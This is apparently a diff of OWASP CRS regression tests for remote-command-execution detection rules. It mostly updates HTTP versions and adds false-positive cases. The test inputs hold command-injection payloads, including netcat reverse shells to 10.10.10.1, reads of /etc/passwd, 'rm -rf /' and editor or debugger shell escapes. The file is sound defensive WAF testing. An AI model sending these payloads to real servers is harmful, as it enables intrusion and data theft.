@@ -17,7 +17,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932206]
@@ -34,7 +34,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932206]
@@ -51,7 +51,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932206]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
index 5e8da6aa3..399c5178e 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932210]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932210]
@@ -48,7 +48,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932210]
@@ -64,7 +64,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=;\\n.databases"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932210]
@@ -80,7 +80,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/juiceshop?s=1;.sh+whoami"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932210]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
index f5e8edbcf..b1254c60b 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
@@ -16,13 +16,13 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          data: "TEST=echo | php7.4"
-          version: HTTP/1.0
+          data: "TEST=echo | gcc7.4"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932220]
   - test_id: 2
-    desc: "TEST=echo | ${php7.4}php7.4"
+    desc: "TEST=echo | ${gcc7.4}gcc7.4"
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -33,8 +33,8 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          data: "TEST=echo | ${php7.4}php7.4"
-          version: HTTP/1.0
+          data: "TEST=echo | ${gcc7.4}gcc7.4"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932220]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "whxami|sh+``"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932220]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "whxami|fish+``"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932220]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "echo | curx"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932220]
@@ -121,7 +121,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cat<<<ifconfig | sh
         output:
@@ -139,7 +139,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cat<<< ifconfig | sh
         output:
@@ -157,7 +157,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cat<<<'ifconfig' | sh
         output:
@@ -175,7 +175,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cat<<<"ifconfig" | sh
         output:
@@ -193,7 +193,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cat<<<$(whoami | sh)
         output:
@@ -211,7 +211,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time whoami | sh
         output:
@@ -229,7 +229,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=strace whoami | sh
         output:
@@ -247,7 +247,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=nohup whoami | sh
         output:
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
index 3fc8a13d8..27cd38d8c 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
@@ -725,10 +725,10 @@ tests:
           uri: "/post"
           data: |
             code=;c89 -wrapper sh,-c,id .
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932230]
+            expect_ids: [932230]
   - test_id: 38
     desc: "55O5COJ5"
     stages:
@@ -743,10 +743,10 @@ tests:
           uri: "/post"
           data: |
             code=;c89 -wrapper sh,-c,curl\ google.com .
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932230]
+            expect_ids: [932230]
   - test_id: 39
     desc: "9323HNQU"
     stages:
@@ -761,7 +761,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -779,7 +779,7 @@ tests:
           uri: "/post"
           data: |
             code=;vim dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -797,7 +797,7 @@ tests:
           uri: "/post"
           data: |
             code=;ex dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -815,7 +815,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -833,7 +833,7 @@ tests:
           uri: "/post"
           data: |
             code=;vim -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -851,7 +851,7 @@ tests:
           uri: "/post"
           data: |
             code=;ex -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -869,10 +869,10 @@ tests:
           uri: "/post"
           data: |
             code=;gdb -nx -ex \!whoami -ex quit
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932230]
+            expect_ids: [932230]
   - test_id: 46
     desc: "JW2SU88A"
     stages:
@@ -885,7 +885,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;cat /path/file.gz
         output:
@@ -903,7 +903,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=;environment"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -919,7 +919,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=;performance"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932230]
@@ -952,7 +952,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<sh -c whoami`
         output:
@@ -970,7 +970,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<< sh -c whoami`
         output:
@@ -988,7 +988,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<'sh -c whoami'`
         output:
@@ -1006,7 +1006,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<"sh -c whoami"`
         output:
@@ -1024,7 +1024,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<$(sh -c whoami)`
         output:
@@ -1042,7 +1042,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time sh -c whoami
         output:
@@ -1060,7 +1060,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=strace sh -c whoami
         output:
@@ -1078,14 +1078,16 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=nohup sh -c whoami
         output:
           log:
             expect_ids: [932230]
   - test_id: 58
-    desc: "Bash - Arithmetic expansion ($[...])"
+    desc: |
+      Bash - Arithmetic expansion ($[...]).
+      Payload: $[$(sh -c 'echo 1')+2]
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -1095,8 +1097,8 @@ tests:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,ima>
-          uri: "/get?932230-58=$%5B2%2B2%5D"
+          uri: "/get?932230-58=$%24%5B%24(sh%20-c%20'echo%201')%2B2%5D"
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [932130]
+            expect_ids: [932230]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml
index def38c960..12af74787 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml
@@ -22,7 +22,7 @@ tests:
           port: 80
           uri: "/post"
           data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932231]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
index 068a16d9b..e3398ec36 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml
@@ -17,7 +17,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?arg=%3Bps"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932232]
@@ -34,7 +34,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?arg=%7Cvi%20%28x"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932232]
@@ -51,7 +51,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?arg=%26w%20%28x"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932232]
@@ -68,10 +68,10 @@ tests:
           method: GET
           port: 80
           uri: "/get?arg=%26aptitude"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932232]
+            expect_ids: [932232]
   - test_id: 5
     desc: Remote Command Execution bypass with time
     stages:
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
index e0270e08a..a9f2fb53c 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
@@ -18,7 +18,7 @@ tests:
           uri: "/post"
           data: |
             code=;find /etc -name passwd -exec cat {} +
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932235]
@@ -36,7 +36,7 @@ tests:
           uri: "/post"
           data: |
             code=cd /;cd etc;column passwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932235]
@@ -54,7 +54,7 @@ tests:
           uri: "/post"
           data: |
             code=cd /;cd etc;bridge -b passwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932235]
@@ -72,7 +72,7 @@ tests:
           uri: "/post"
           data: |
             code=cd /;cd etc;fold passwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932235]
@@ -90,7 +90,7 @@ tests:
           uri: "/post"
           data: |
             code=;flock -u / whoami
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932235]
@@ -108,7 +108,7 @@ tests:
           uri: "/post"
           data: |
             code=;cd /;cd etc;base32 passwd|base32 -d
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932235]
@@ -124,7 +124,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;cpulimit -l 100 -f whoami
         output:
@@ -142,7 +142,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             cd /;cd etc;comm passwd passwd
         output:
@@ -160,7 +160,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             CD /;CD ETC;COMM PASSWD PASSWD
         output:
@@ -178,7 +178,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=comment"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932235]
@@ -194,7 +194,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=;performance"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932235]
@@ -227,7 +227,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<ifconfig`
         output:
@@ -245,7 +245,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<< ifconfig`
         output:
@@ -263,7 +263,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<'ifconfig'`
         output:
@@ -281,7 +281,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<"ifconfig"`
         output:
@@ -299,7 +299,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<$(ifconfig)`
         output:
@@ -317,7 +317,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time ifconfig
         output:
@@ -335,7 +335,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=strace ifconfig
         output:
@@ -391,7 +391,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=nohup ifconfig
         output:
@@ -409,7 +409,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible all -m ping
         output:
@@ -427,7 +427,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-config dump
         output:
@@ -445,7 +445,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-galaxy collection install community.general
         output:
@@ -463,7 +463,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-console
         output:
@@ -481,7 +481,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-doc plugin ping
         output:
@@ -499,7 +499,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-inventory --list
         output:
@@ -517,7 +517,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-pull --url example.com
         output:
@@ -535,7 +535,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-vault decrypt secret
         output:
@@ -553,7 +553,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; ansible-playbook site.yml
         output:
@@ -571,7 +571,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; chef-vault -i secret
         output:
@@ -589,7 +589,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; chef-shell
         output:
@@ -607,7 +607,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; chef-run all recipie.rb
         output:
@@ -625,7 +625,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; chef-client -t 1.1.1.1
         output:
@@ -643,7 +643,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; visudo
         output:
@@ -661,7 +661,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time; cscli alerts list
         output:
@@ -680,6 +680,202 @@ tests:
           port: 80
           uri: "/get?test=Times%20%26%20Schedule"
           version: HTTP/1.1
+        output:
+          log:
+            no_expectids: [932235]
+  - test_id: 39
+    desc: "FP against time express"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?test=time%20express"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 40
+    desc: "FP against `Straße; links Haus Nr. 104` matching `; links`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=Die untere Dortmunder Straße; links Haus Nr. 104, das stadteinwärts (rechts) längere Zeit ohne Nachbarhaus geblieben war.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 41
+    desc: "FP against `three full-time jobs` matching `full-time jobs`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=He was working three full-time jobs at Meta, IBM, and Tinder.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 42
+    desc: "FP against `a timeless cinematic icon` matching `timeless`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=now-legendary take on Catwoman turned the character into a timeless cinematic icon.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 43
+    desc: "FP against `some playing time last year` matching `time last`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=Sophomore Deon King Jr. received some playing time last year as a freshman and totaled 12 tackles.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 44
+    desc: "FP against `annulla le ultime date` matching `ultime date`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=La cantante veneta annulla le ultime date del suo tour estivo.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 45
+    desc: "FP against `The best time to watch local birds` matching `time to watch local`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=The best time to watch local birds is June–August and the best time for migratory birds is November–February.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 46
+    desc: "FP against `real time source of data` matching `time source`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=Search data can thus provide an alternative, real time source of data on migration intentions.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 47
+    desc: "FP against `in record time (less than 1 minute!)` matching `time (less`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=Back in the UK, we sped through the UK Border at Stansted in record time (less than 1 minute!) and uploaded this report from the rather flatter rocks of Stansted Airport train station platform (but thankfully they are still sunny!
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 48
+    desc: "FP against `privé – le Swatch Group – de` matching `swatch group`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |
+            payload=Elle interdit à une société de droit privé – le Swatch Group – de livrer ses concurrents après l’avoir forcé pendant des années à livrer ces mêmes clients.
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932235]
+  - test_id: 49
+    desc: "False Positive: matching pipe `self`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=Compra a MODULAR ALUMINIO ESTRUCTURAL, STRUT PROFILE PG30 30X30 4 SLOTS | SELF TAPPING SCREW PG30 M1
         output:
           log:
             no_expect_ids: [932235]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
index 8b2b6d423..9610592cb 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
@@ -20,7 +20,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: ;cp /var/log/apache2/error.log evil.php
         output:
           log:
@@ -77,7 +77,7 @@ tests:
           uri: "/post"
           data: |
             code=;c89 -wrapper sh,-c,id .
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -95,7 +95,7 @@ tests:
           uri: "/post"
           data: |
             code=;c89 -wrapper sh,-c,curl\ google.com .
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -113,7 +113,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -131,7 +131,7 @@ tests:
           uri: "/post"
           data: |
             code=;vim dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -149,7 +149,7 @@ tests:
           uri: "/post"
           data: |
             code=;ex dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -167,7 +167,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -185,7 +185,7 @@ tests:
           uri: "/post"
           data: |
             code=;vim -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -203,7 +203,7 @@ tests:
           uri: "/post"
           data: |
             code=;ex -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -221,7 +221,7 @@ tests:
           uri: "/post"
           data: |
             code=;gdb -nx -ex \!whoami -ex quit
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932236]
@@ -237,7 +237,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;cat /path/file.gz
         output:
@@ -255,7 +255,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             find /etc -name passwd -exec cat {} +
         output:
@@ -273,7 +273,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=flock -u / whoami
         output:
@@ -291,7 +291,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cat /path/file.gz
         output:
@@ -309,7 +309,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cpulimit -l 100 -f whoami
         output:
@@ -327,7 +327,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?field_metatags[0][advanced][rights]=somevalue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -343,7 +343,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=MailerUI"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -359,7 +359,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=tasksListView"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -817,7 +817,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=comment"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -833,7 +833,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=settings"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -887,7 +887,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=environment"
-          version: HTTP/1.0
